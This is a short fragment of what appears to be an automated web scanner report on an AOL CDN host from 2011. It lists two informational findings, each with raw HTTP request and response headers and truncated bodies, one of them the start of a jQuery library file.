GET /lifestream/cdn/27.0.10 Host: o.aolcdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html Cteonnt-Length: 2862 Cache-Control: max-age=2407192 Expires: Wed, 01 Jun 2011 21:39:06 GMT Date: Thu, 05 May 2011 00:59:14 GMT Connection: close Vary: Accept-Encoding Content-Length: 2862 ..............(...6...... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://o.aolcdn.com |
Path: | /os_merge/ |
GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://mobile.aol.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 16 Mar 2011 00:09:42 GMT Content-Type: text/plain Cache-Control: public, max-age=2592000 Expires: Sat, 04 Jun 2011 00:58:27 GMT Date: Thu, 05 May 2011 00:58:27 GMT Connection: close Vary: Accept-Encoding Content-Length: 108120 /*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz ...[SNIP]... |